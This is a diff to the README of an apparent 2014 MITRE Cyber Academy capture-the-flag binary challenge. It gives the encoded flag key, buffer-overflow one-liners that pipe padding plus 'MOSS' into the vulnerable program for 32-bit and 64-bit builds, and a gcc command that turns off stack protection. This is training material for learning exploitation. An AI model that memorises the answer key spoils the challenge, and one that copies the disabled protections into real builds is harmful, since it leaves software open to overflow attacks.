mitre-cyber-academy/2014-binary-100/README.md

 Key: aSByZWFsbHkgaG9wZSBsaWZlIGdldHMgZWFzaWVyLi4u

 Solution: One way to solve this would be to use a scripting language to overflow the buffer.
+Example solutions:

+For 32 bit: python -c 'print "A"*80 + "MOSS"' | ./buff
-Example solution: python -c 'print "A"*88 + "MOSS"' | ./buff
+For 64 bit: python -c 'print "A"*88 + "MOSS"' | ./buff

 To compile: We have to disable the overflow protection.
 During testing I had compiled using the following command: gcc -Wall -fno-stack-protector -D_FORTIFY_SOURCE=0 buff.c -o buff